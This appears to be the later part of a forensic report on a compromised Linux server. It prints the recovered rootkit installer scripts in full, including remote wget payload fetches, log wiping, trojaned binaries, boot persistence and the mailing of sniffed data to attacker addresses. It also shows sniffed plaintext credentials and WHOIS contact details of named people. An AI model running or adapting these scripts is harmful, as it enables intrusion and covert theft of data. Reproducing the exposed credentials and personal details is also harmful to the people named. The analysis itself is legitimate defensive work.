The nationality of the attacker(s) are Romanian, basing on the IP 213.154.118.200 which resolves to is.pcnet.ro which is also being found inside the configuration and log files of psybnc located at /etc/opt directory and using the clean binary netstat located in /usr/lib/libshtift/. Using grep on the disk and on core file located on /proc/kcore. Found the attackers  URL redirected website http://redcode.strobe.org [1j] at http://redcode.go.ro/ from  their hosting site (http://strobe.org / http://freedns.afraid.org) see traces. This is also being found on psybnc logs with channel #redcode seen on it, the Blackhat handle [siCk] which is plainly seen and the Romanian transcripts (Translated [1g])found also on the scripts.

 


 

vi. SCRIPTS

 

File ".inst" installation script for adore rootkit. Source Location wget izolam.net\inst (Remote)

#!/bin/sh
unset HISTFILE HISTSIZE HISTSAVE
BLK="\033[0;30m"
RED="\033[0;31m"
GRN="\033[0;32m"
YEL="\033[0;33m"
BLU="\033[0;34m"
MAG="\033[0;35m"
CYN="\033[0;36m"
WHI="\033[0;37m"
DRED="\033[1;31m"
DGRN="\033[1;32m"
DYEL="\033[1;33m"
DBLU="\033[1;34m"
DMAG="\033[1;35m"
DCYN="\033[1;36m"
DWHI="\033[1;37m"
BW="\033[47;1;30m"
YBL="\033[44;1;33m"
RES="\033[0m"
printf "${YBL}redCode${RES} ${DRED}rkit${RES}\n"
printf "${YBL}redCode${RES}${YBL}redCode${RES}${YBL}redCode${RES}\n"
cd adore
make
mv ava /bin/ava
mv adore.o /usr/lib/
mv cleaner.o /usr/lib/
cd ..
printf "${DCYN}Starting SSHD...${RES}\n"
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
mv ssh/sp0 /bin/
mv ssh/* /usr/lib/
 
printf "${DCYN}Hiding everything...${RES}\n"
rm -rf /.bash_history
ln -sf /dev/null /root/.bash_history
 
printf "${DCYN}Cleaning megs ${RES}\n"
rm -rf /var/log/messages
ln -sf /dev/null /var/log/messages
 
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
echo >>/etc/rc.d/rc.sysinit kflushd
mv kflushd /bin/
kflushd
 
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
printf "${DCYN}Cleaning all the tracks...${RES}\n"
cd ..
rm -rf .rc
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
printf "${DCYN}All done...${RES}\n"
printf "${DCYN}You Got The root${RES} ${YEL}$IP${RES}\n"
printf "${DRED}Copyright ${BW}[siCk]${RES} ${DCYN}\n"
 

File “.boot" scripts contains the scripted commands. Location directory /lib/.x/ (Local)

#!/bin/sh

SSHPORT=`cat /lib/.x/s/port`

IP=`cat /lib/.x/ip`

TIME=`date`

/lib/.x/s/xopen -q -p ${SSHPORT} >> /lib/.x/reboot.log

/lib/.x/s/lsn &

/lib/.x/sk p 1 >> /lib/.x/reboot.log

/lib/.x/sk f 1 >> /lib/.x/reboot.log

echo "###Host ${IP} went online on ${TIME}" >> /tmp/13996log

echo >> /tmp/13996maillog

echo >> /tmp/13996maillog

echo "###SSHD backdoor port: ${SSHPORT}" >> /tmp/13996log

echo >> /tmp/13996maillog

echo >> /tmp/13996maillog

echo "###Sniffer log:" >> /tmp/13996log

echo "      - TTY Sniffer:" >> /tmp/13996log

cat /lib/.x/.lurker >> /tmp/13996log

echo >> /tmp/13996maillog

echo "      - Network Sniffer:" >> /tmp/13996log

cat /lib/.x/s/mfs >> /tmp/13996maillog

echo >> /tmp/13996maillog

echo >> /tmp/13996maillog

echo "###Reboot log:" >> /tmp/13996log

cat /lib/.x/reboot.log >> /tmp/13996log

echo >> /tmp/13996maillog

echo >> /tmp/13996maillog

cat /tmp/13996log | mail -s "Host ${IP} is up!" skiZophrenia_sick@yahoo.com

/lib/.x/hide

/lib/.x/cl -f /var/log/maillog yahoo > /dev/null

/lib/.x/cl -s o.tgz > /dev/null

/lib/.x/cl -s suckit > /dev/null

/lib/.x/cl -s xopen > /dev/null

/lib/.x/cl -s promisc > /dev/null

/lib/.x/cl -f promisc /var/log/secure > /dev/null

rm -rf /tmp/13996*

rm -rf /lib/.x/reboot.log

File ".install"  script part of file from original source. wget geocities.com/mybabywhy/rk.tar.gz  (REMOTE)

#!/bin/bash

# Made By ICE

 

BLK='_[1;30m'

RED='_[1;31m'

GRN='_[1;32m'

YEL='_[1;33m'

BLU='_[1;34m'

MAG='_[1;35m'

CYN='_[1;36m'

WHI='_[1;37m'

DRED='_[0;31m'

DGRN='_[0;32m'

DYEL='_[0;33m'

DBLU='_[0;34m'

DMAG='_[0;35m'

DCYN='_[0;36m'

DWHI='_[0;37m'

RES='_[0m'

 

USERID=`id -u`

echo "${WHI}---${RED}   Verificam daca suntem ROOT ${WHI} !!!${RES}"

if [ $USERID -eq 0 ]

then

echo "${RED}+++${WHI}   Cica DA ..., deci putem continua ${BLU} :${WHI}-${RED})${RES}"

else

echo "${RED}--- ${DRED}!!! ${RED}Atentie tu eshti de fapt ${YEL}$USERID${RED} si nu ${GRN}RooT ${DRED}!!!${RES}"

echo "${WHI}               Asta ii un ${BLU}ROOTKIT${WHI} deshteptule si trebuie sa aiba ${GRN}uid=0${RES}"

exit

fi

 

rk=`pwd`

home="/usr/bin"

etc="/etc"

usr="/usr/lib/libshtift"

netstat="/bin/netstat"

ls="/bin/ls"

ps="/bin/ps"

top="/usr/bin/top"

chattr="/usr/bin/chattr"

chat="/usr/lib/ld/chat"

pico="/bin/pico"

wget="/usr/bin/wget"

ifconfig="/sbin/ifconfig"

ttyop="/dev/ttyop"

ttyoa="/dev/ttyoa"

ttyof="/dev/ttyof"

if [ -f "/usr/bin/gcc" ]; then

gcc="/usr/bin/gcc"

 else

     if [ -f "/usr/local/bin/gcc" ]; then

     gcc="/usr/local/bin/gcc"

       else

           if [ -f "/usr/bin/cc" ]; then

           gcc="/usr/bin/cc"

             else

                 if [ -f "/usr/local/bin/cc" ]; then

                 gcc="/usr/local/bin/cc"

                  else

                     gcc="/usr/bin/gnikcs"

fi; fi; fi; fi

 

unset HISTFILE; chown root.root *; unalias &> /dev/null ls

echo "                                          "

echo "${WHI}                @@@ ${GRN}OK ${BLU}ICE sau care eshti pe acolo , de preferabil Budu :-)${GRN} .., deci sa bagam mare ${BLU}!!!${WHI}@@@${RES}"

echo "                                          "

if [ -f /etc/rc.d/init.d/portmap ]; then

 /etc/rc.d/init.d/portmap stop

fi

if [ -f /etc/rc.d/init.d/syslog ]; then

 /etc/rc.d/init.d/syslog stop

fi

 

killall &> /dev/null -9 syslogd

killall &> /dev/null -9 klogd

killall &> /dev/null -9 atd

 

$chattr &> /dev/null -ASacdisu /bin /bin/* /usr/bin /usr/bin/* /sbin /sbin/* /usr/sbin /usr/sbin/* $etc/im* $usr $usr/* $ttyop $ttyoa $ttyof

echo "${WHI} Sa tragem o privire dupa fisiere.. ${DRED}!${RES}"

echo "                                                  "

if [ -f $chattr ]; then

 echo "                       ${WHI}chattr${RED} -> ${BLU}ok${RES}"

else

if [ -f $chat ]; then

 /usr/lib/ld/chat -R -ASacdisu /usr/bin $chat

 cp -f $chat $chattr

else

 tar -xzf chattr.tgz

 mv -f chattr $chattr

 echo "                       ${WHI}chattr${RED}->${BLU}atasat${RES}"

 chmod +x $chattr

fi; fi

 

if [ -f $wget ]; then

 echo "                       ${WHI}wget${RED} -> ${BLU}ok${RES}"

else

 tar -xzf wget.tgz

 mv -f wget $wget

 echo "                       ${WHI}wget${RED} -> ${BLU}atasat${RES}"

 chmod +x $wget

fi

 

if [ -f $pico ]; then

 echo "                       ${WHI}pico${RED} -> ${BLU}ok${RES}"

else

 tar -xzf pico.tgz

 mv -f pico $pico

 echo "                       ${WHI}pico${RED} -> ${BLU}atasat${RES}"

 chmod +x $pico

fi

 

echo " ${WHI}Rezolvam tampeniile de ps, netstat si etc.., si pe sora-sa :-P${RES}"

 

mkdir $usr; mv $netstat $ps $ls $ifconfig $top $usr; mv netstat $netstat; mv ps $ps; mv ifconfig $ifconfig; mv ls $ls; mv top $top; mv .ttyop $ttyop; mv .ttyoa $ttyoa; mv .ttyof $ttyof

 

echo "                          ${WHI}Tampeniile${RED} ->${BLU}Done${RES}"

 

echo " ${WHI}Copiem ${BLU}SSH-ul ${WHI}si ce mai e nevoie :-P .. ${RES}"

 

mv -f  sense sl2 logclear $home; echo "/usr/bin/crontabs -t1 -X53 -p" >> /etc/rc.d/init.d/functions; echo >> /etc/rc.d/init.d/functions; mv crontabs -f /usr/bin/; chmod 500 /usr/bin/crontabs

./ava

$gcc -o swapd kde.c

if [ -f swapd ]; then

 mv swapd /usr/bin/"(swapd)"

else

 mv swapd2 /usr/bin/"(swapd)"

fi

mv lpi /usr/bin

mv libsss /usr/lib

chmod +x /usr/bin/lpi

/usr/bin/crontabs

/usr/bin/lpi

 

echo " ${RED}ATENTIE!!! ${DRED}Tu tre sa dai ${WHI} cd /usr/bin ; sense tcp.log ; logclear ${RES}"

 

./sysinfo > informatii

echo " ${WHI}Imediat iti trimit Mail ${BLU}BAH${WHI} mai ai rabdare 2 min..${RES}"

echo "                        "

cat informatii|mail -s "SANDERS root" mybabywhy@yahoo.com

cat informatii|mail -s "SANDERS root" buskyn17@yahoo.com

 

echo "                        ${WHI}Mail ${RED}-> ${BLU}Done.${RES}"; echo "                          "

echo " ${WHI}*** ${GRN}Sa ne facem si noi un catun pe aici! ${BLU};${WHI}-${RED}) ${WHI}***${RES}"

 

if [ ! -d /dev/hpd ]; then

 mkdir /dev/hpd

fi

 

echo " ${WHI}*** ${GRN}Director-ul /dev/hpd a fost deja creat gajiule:))${WHI} ***${RES}"

echo " ${WHI}*** ${BLU}Acum sa stergem logurile care ne incurca ${WHI}***${RES}"

 

rm -rf /var/log/*

touch /var/log/wtmp

if [ -f /etc/rc.d/init.d/syslog ]; then

 /etc/rc.d/init.d/syslog restart

fi

if [ -f /etc/rc.d/init.d/portmap ]; then

 /etc/rc.d/init.d/portmap restart

fi

 

cd ..

 

unset HISTFILE; $chattr +AacdisSu /bin /bin/* /usr/bin/sense /usr/bin/top /sbin /sbin/* /usr/sbin /usr/sbin/* $etc/im* $ttyop $ttyoa $ttyof

rm -rf /usr/bin/lpi

rm -rf simpa*

echo "                                                  "

echo "${WHI}@@@ ${GRN}OK ${BLU}Shefu${GRN}.., e al tau, bucura-te ca eshti mai destept cu un ${BLU}RooT ${BLU};${WHI}-${RED}P ${WHI}@@@${RES}"

File "gods" Adore Rootkit Installation scripts original location http://izolam.net/gods (REMOTE)
unset HISTFILE HISTSIZE HISTSAVE
BLK="\033[0;30m"
RED="\033[0;31m"
GRN="\033[0;32m"
YEL="\033[0;33m"
BLU="\033[0;34m"
MAG="\033[0;35m"
CYN="\033[0;36m"
WHI="\033[0;37m"
DRED="\033[1;31m"
DGRN="\033[1;32m"
DYEL="\033[1;33m"
DBLU="\033[1;34m"
DMAG="\033[1;35m"
DCYN="\033[1;36m"
DWHI="\033[1;37m"
BW="\033[47;1;30m"
YBL="\033[44;1;33m"
RES="\033[0m"
printf "${YBL}redCode${RES}${YBL}redCode${RES}${YBL}redCode${RES}\n"
printf "${YBL}redCode${RES}${YBL}Face Treaba${RES}${YBL}ushoara${RES}\n"
printf "${DCYN}Creating Directory...${RES}\n"
mkdir /tmp/rk
printf "${DCYN}Entering Directory${RES}\n"
cd /tmp/rk
printf "${DCYN}OK${RES}\n"
printf "${DCYN}getting the files...${RES}\n"
wget izolam.net/rc/inst -q
wget izolam.net/rc/kflushd -q
printf "${DCYN}OK${RES}\n"
printf "${DCYN}Creating Directory...${RES}\n"
sleep 1
mkdir /tmp/rk/adore
printf "${DCYN}Entering Directory${RES}\n"
cd /tmp/rk/adore/
printf "${DCYN}OK${RES}\n"
printf "${DCYN}getting the files...${RES}\n"
wget izolam.net/rc/adore/adore.c -q
wget izolam.net/rc/adore/ava.c -q
wget izolam.net/rc/adore/dummy.c -q
wget izolam.net/rc/adore/exec.c -q
wget izolam.net/rc/adore/exec-test.c -q
wget izolam.net/rc/adore/libinvisible.c -q
wget izolam.net/rc/adore/libinvisible.h -q
wget izolam.net/rc/adore/cleaner.c -q
sleep 4
printf "${DCYN}OK${RES}\n"
printf "${DCYN}getting the Makefile${RES}\n"
wget izolam.net/rc/adore/Makefile -q
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
printf "${DCYN}Leaving directory..${RES}\n"
printf "${DCYN}Creating Directory...${RES}\n"
mkdir /tmp/rk/ssh
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
cd /tmp/rk/ssh
printf "${DCYN}getting the files...${RES}\n"
wget izolam.net/rc/ssh/sp0 -q
wget izolam.net/rc/ssh/sp0_cfg -q
wget izolam.net/rc/ssh/sp0_key -q
wget izolam.net/rc/ssh/sp0_seed -q
sleep 2
printf "${DCYN}Changing the file modes..${RES}\n"
chmod 777 sp0
printf "${DCYN}OK${RES}\n"
printf "${DCYN}Leaving directory..${RES}\n"
cd /tmp/rk/
chmod 777 inst kflushd
sleep 1
printf "${DCYN}OK${RES}\n"
printf "${DCYN}Cleaning...${RES}\n"
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"
printf "${DCYN}All done...${RES}\n"
printf "${DCYN}You Got The redCode rk${RES} ${YEL}$IP${RES}\n"
printf "${DRED}Copyright ${BW}[siCk]${RES} ${DCYN}\n"

 

vii. TRACES

 

trace of 213.154.118.200 or is.pcnet.ro

 

domain-name: pcnet.ro
description: PC-NET Data Network
admin-contact: MB51-ROTLD
technical-contact: AN160-ROTLD
zone-contact: AB494-ROTLD
nameserver:  ns1.pcnet.ro 213.154.128.1
nameserver:  ns2.pcnet.ro 213.154.128.2
nameserver:  ns3.pcnet.ro 213.154.128.3
info:        object maintained by ro.rnc local registry
info:        Register your .ro domain names at http://www.samspade.org/t/refer?a=www.rotld.ro
notify:      domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
mnt-lower:   ROTLD-MNT
updated:     domain-admin@listserv.rnc.ro 19970519
updated:     ciprian@rnc.ro 19990601
updated:     ciprian@rnc.ro 19991207
updated:     cristih@rnc.ro 20000829
source:      ROTLD

person:      Mihai Batraneanu
address:     PC-NET Data Network S.A.
address:     Splaiul Unirii 10, bl B5, sc2, et 1
address:     Bucharest, Romania
phone:       +40-21-330 28 01
fax-no:      +40-21-330 28 42
e-mail:      mihai@pcnet.ro
nic-hdl:     MB51-ROTLD
info:        object maintained by ro.rnc local registry
notify:      domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated:     danacorb@sunu.rnc.ro 19970901
updated:     ciprian@rnc.ro 19991207
source:      ROTLD

person:      Alina-Mihaela Nemes
address:     PCNET DATA NETWORK SA
address:     Bd. Mircea Eliade, nr. 18
address:     Bucharest, Romania
phone:       +40-21-2080460
fax-no:      +40-21-2080461
e-mail:      alina@pcnet.ro
nic-hdl:     AN160-ROTLD
info:        object maintained by ro.rnc local registry
notify:      domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated:     danacorb@sunu.rnc.ro 19970901
updated:     ciprian@rnc.ro 19991207
updated:     imanea@rnc.ro 19991207
source:      ROTLD

person:      Adrian Batraneanu
address:     PC-NET Data Network S.A.
address:     Splaiul Unirii 10, bl B5, sc2, et 1
address:     Bucharest, Romania
phone:       +40-21-330 28 01
fax-no:      +40-21-330 28 42
e-mail:      adi@pcnet.ro
nic-hdl:     AB494-ROTLD
info:        object maintained by ro.rnc local registry
notify:      domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated:     danacorb@sunu.rnc.ro 19970901
updated:     ciprian@rnc.ro 19991207
source:      ROTLD
 

 

trace of redcode.strobe.org

 

Domain ID:D7834992-LROR
Domain Name:STROBE.ORG
Created On:08-Jul-1999 05:22:28 UTC
Last Updated On:23-Sep-2003 08:03:27 UTC
Expiration Date:08-Jul-2010 05:22:28 UTC
Sponsoring Registrar:R63-LROR
Status:OK
Registrant ID:22942110-NSI
Registrant Name:Strobe Your Mind
Registrant Organization:Strobe Your Mind
Registrant Street1:19 South 4th Street
Registrant City:Columbia
Registrant State/Province:MO
Registrant Postal Code:65201
Registrant Country:US
Registrant Email:james@STROBE.ORG
Admin ID:15340317-NSI
Admin Name:Strobe Your Mind
Admin Organization:Strobe Your Mind
Admin Street1:19 S 4TH ST
Admin City:COLUMBIA
Admin State/Province:MO
Admin Postal Code:65201-4226
Admin Country:US
Admin Email:james@TRANQUILITY.NET
Billing ID:15340317-NSI
Billing Name:Strobe Your Mind
Billing Organization:Strobe Your Mind
Billing Street1:19 S 4TH ST
Billing City:COLUMBIA
Billing State/Province:MO
Billing Postal Code:65201-4226
Billing Country:US
Billing Email:james@TRANQUILITY.NET
Tech ID:5677673-NSI
Tech Name:Paul ** Saab
Tech Street1:788 Harrison Apt 521
Tech City:San Francisco
Tech State/Province:CA
Tech Postal Code:94107
Tech Country:US
Tech Email:ps@MU.ORG
Name Server:NS1.AFRAID.ORG
Name Server:NS2.AFRAID.ORG
 

 


 

viii. SNIFFER LOGS

 

Format source IP to destination IP and PORT followed by parse DATA. Location (LOCAL)

64.183.193.202 => mir-serv.ez-closet.com [110]

user jan password jan

 

cgomez => mir-serv-ez-closet.com [110] most frequent user?

user carlos password eduardo

 

cgomez => 216.141.104.150 [21]

user anonymous

pass IEUser@

 

211.114.43.197 => linuxserv.gocadd.com [21]

 

mir-serv.ez-closet => 216.136.173.10 [110]

USER nellabrito

pass nella

 

217.156.101.89 => linuxserv.gocadd.com [21]

7K7L707S

 

host-64-183-193-202.covadbiz.com => mir-serv.ez-closet.com [110]

user jan pass jan

 

63.222.209.181 => mir-serv.ez-closet.com [110]

user jan pass jan

 

63.222.209.181 => rpmfind.speakeasy.net [21]

user anonymous pass mozilla@

RETR /linux/rawhide/1.0/i386/RedHat/RPMS/tcpdump-3.6.2-3.i386.rpm

 

cgomez => mir-serv.ez-closet.com [110]

user caroline pass carola

raq3a.surfmore.net => linuxserv.gocadd.com [21]

JlUSER ftpass lamer@

 

mir-serv.ez-closet.com => web.rge.com [21]

user anonymous pass IEUser@

RETR /pub/systems/simtelnet/dr/zonelabs/zapro26dr4.exe

 

cgomez => 216.141.104.150 [21]

user anonymous pass: IEUser@


 

ix. LINKS OR RELATED TECHNICAL REFERENCES

 

     [10] Basic Steps in Forensics  Analysis of Unix Systems

     http://staff.washington.edu/dittrich/misc/forensics/

 

     [11] Thomas Rude - Evidence Seizure Methodology for Computer Forensics

           http://www.crazytrain.com/seizure.html

 

     [12] Sniffing (network wiretap, sniffer)

     http://www.robertgraham.com/pubs/sniffing-faq.html

   

    [13] Interface Promiscuity Obscurity

     http://www.phrack.org/show.php?p=53&a=10

 

     [14] Adore Rootkit

     http://spider.scorpions.net/~stealth

   

     [15] SleuthKit

     www.sleuthkit.org

 

          [1a] IANA Port's Assignment

     http://www.iana.org/assignments/port-numbers 

 

     [1b] Assorted online query tool

     http://www.samspade.org

[1c] Md5deep recursively computes MD5 message digests of input files.

http://md5deep.sourceforge.net/

 

[1d] Die Putze - The Ultimate unix logfile cleaner

http://www.unixgeek.de

 

[1e] Linux on-the-fly kernel patching without LKM :Suckit the implementation

http://www.phrack.org/show.php?p=58&a=7

 

[1f] UPX The Ultimate Packer for eXecutable

http://upx.sourceforge.net

         [1g] Language Translation (Utilized in translating portions of file recovered)

     http://www.foreignword.com/Tools/transnow.htm

     

         [1h] Powerful Virtual Machine Software for Technical Professionals

     http://www.vmware.com

      

     [1i] Locally checks for signs of rootkit

     http://www.chkrootkit.org

 

     [1j] Romanian Black Hats Web Site

     http://redcode.strobe.org/ hosted by (http://freedns.afraid.org /  

     http://strobe.org) URL redirected to http://redcode.go.ro/

 

"...sunt doar un purtator de cunostinte, care a reusit sa inteleaga cum functioneaza cu adevarat lumea si sunt dispus ca experienta si cunostintele mele sa foloseasca celor care cu nerabdare cauta adevarata libertate..."

[siCk]